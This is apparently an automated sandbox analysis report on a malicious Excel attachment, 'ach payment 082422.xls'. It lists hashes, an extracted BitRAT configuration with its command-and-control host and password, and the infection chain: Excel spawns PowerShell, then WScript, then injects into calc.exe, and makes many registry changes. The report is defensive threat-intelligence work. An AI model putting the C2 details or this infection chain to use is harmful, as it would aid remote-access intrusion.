Analysis
-
max time kernel
101s -
max time network
104s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
24-08-2022 18:33
Behavioral task
behavioral1
Sample
ach payment 082422.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ach payment 082422.xls
Resource
win10v2004-20220812-en
General
-
Target
ach payment 082422.xls
-
Size
29KB
-
MD5
70c9d8b73d8b0b704ca4eed431f0b8b9
-
SHA1
700df606142d4d599078112277f6352134a5376b
-
SHA256
33a03e5a48aa54e8ade7fa89d977a846b517956ee17a0419c68698742104450b
-
SHA512
b682cf9edfac472dfec29d8bad297b436321eb16c6dd3bbd3c77d660fabdf5089296657a02e1d74fb960f8784cf87bb1d924778806ae75bf484324dbb719bbed
-
SSDEEP
768:vgk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJRB5kPok:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdv
Malware Config
Extracted
bitrat
1.38
bitm.dvrlists.com:6061
-
communication_password
cef08aa1523518b499f65898132b7512
-
tor_process
tor
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1184 2024 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 5 1184 powershell.exe 11 1640 powershell.exe -
Processes:
resource yara_rule behavioral1/memory/1576-101-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-103-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-104-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-106-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-108-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-110-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-114-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1576-116-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 1640 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
calc.exepid process 1576 calc.exe 1576 calc.exe 1576 calc.exe 1576 calc.exe 1576 calc.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1640 set thread context of 1576 1640 powershell.exe calc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1636 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
iexplore.exeEXCEL.EXEIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1B528BD1-23EC-11ED-B40B-E20468906380} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 402d50f3f8b7d801 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c0000000002000000000010660000000100002000000011090e563d75d16f1e1fbf9a192cc76e79b52f46aead679bd354eb509b2b0c26000000000e8000000002000020000000766602af204357333822148e0ac8b8af8707419e0990d41bcff693baf448925d900000003abe9b23b4c4aec0a497d30d395b41a5a31c0f5e22fab6ad4e2377083241ebadc5393b31512e8ccfea81c0aa8392b4838f199309003805b4a8d2d108eb2783bbe81b0f4e48f97b5316f2e04ad465113f9c17f32bd437f4286853e2c517dd1aae7448f8e7dace5e22bb64d6b19e98c3892024a9be7780d397e6e90ee86360cd2f14db7c1257c694344585a949ada2687b400000003078a4ae0e6422e19a54f9b45181558e06390d7b5d4991acedc0776b2724cc776f16ab5af6969cdeab02f2c1904f507a069c1cefff9d1291ec6e6b176e73e02a iexplore.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c00000000020000000000106600000001000020000000a76e216a6bf1c3958318d8f2e7d73791a0ca5d059d284ab69cb0a4a63f2413e2000000000e8000000002000020000000fc2858df04a94ed92281e94c95e15232255fc97672ad3da6a701ae9b5f55f3952000000063047913fc566ec1fb65d830d6d512ef171ce27a7b16d27a39e43f3462a9b7014000000042561d3415fb1caf6c5473eb218fd7c01e70fd5e1df115016fa689248739d6fc56de69a1c9612b6ef5bb94884602c0e9040b958f1249c62507a563c119a540f5 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2024 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1184 powershell.exe 1184 powershell.exe 1184 powershell.exe 1640 powershell.exe 1456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exepowershell.exepowershell.execalc.exedescription pid process Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1640 powershell.exe Token: SeSecurityPrivilege 1640 powershell.exe Token: SeTakeOwnershipPrivilege 1640 powershell.exe Token: SeLoadDriverPrivilege 1640 powershell.exe Token: SeSystemProfilePrivilege 1640 powershell.exe Token: SeSystemtimePrivilege 1640 powershell.exe Token: SeProfSingleProcessPrivilege 1640 powershell.exe Token: SeIncBasePriorityPrivilege 1640 powershell.exe Token: SeCreatePagefilePrivilege 1640 powershell.exe Token: SeBackupPrivilege 1640 powershell.exe Token: SeRestorePrivilege 1640 powershell.exe Token: SeShutdownPrivilege 1640 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeSystemEnvironmentPrivilege 1640 powershell.exe Token: SeRemoteShutdownPrivilege 1640 powershell.exe Token: SeUndockPrivilege 1640 powershell.exe Token: SeManageVolumePrivilege 1640 powershell.exe Token: 33 1640 powershell.exe Token: 34 1640 powershell.exe Token: 35 1640 powershell.exe Token: SeDebugPrivilege 1576 calc.exe Token: SeShutdownPrivilege 1576 calc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1088 iexplore.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEcalc.exepid process 2024 EXCEL.EXE 2024 EXCEL.EXE 2024 EXCEL.EXE 1088 iexplore.exe 1088 iexplore.exe 1832 IEXPLORE.EXE 1832 IEXPLORE.EXE 1576 calc.exe 1576 calc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
EXCEL.EXEpowershell.exeiexplore.exeWScript.exepowershell.execalc.execmd.exedescription pid process target process PID 2024 wrote to memory of 1184 2024 EXCEL.EXE powershell.exe PID 2024 wrote to memory of 1184 2024 EXCEL.EXE powershell.exe PID 2024 wrote to memory of 1184 2024 EXCEL.EXE powershell.exe PID 2024 wrote to memory of 1184 2024 EXCEL.EXE powershell.exe PID 1184 wrote to memory of 1532 1184 powershell.exe WScript.exe PID 1184 wrote to memory of 1532 1184 powershell.exe WScript.exe PID 1184 wrote to memory of 1532 1184 powershell.exe WScript.exe PID 1184 wrote to memory of 1532 1184 powershell.exe WScript.exe PID 1088 wrote to memory of 1832 1088 iexplore.exe IEXPLORE.EXE PID 1088 wrote to memory of 1832 1088 iexplore.exe IEXPLORE.EXE PID 1088 wrote to memory of 1832 1088 iexplore.exe IEXPLORE.EXE PID 1088 wrote to memory of 1832 1088 iexplore.exe IEXPLORE.EXE PID 1532 wrote to memory of 1640 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1640 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1640 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1640 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1456 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1456 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1456 1532 WScript.exe powershell.exe PID 1532 wrote to memory of 1456 1532 WScript.exe powershell.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1640 wrote to memory of 1576 1640 powershell.exe calc.exe PID 1576 wrote to memory of 1460 1576 calc.exe cmd.exe PID 1576 wrote to memory of 1460 1576 calc.exe cmd.exe PID 1576 wrote to memory of 1460 1576 calc.exe cmd.exe PID 1576 wrote to memory of 1460 1576 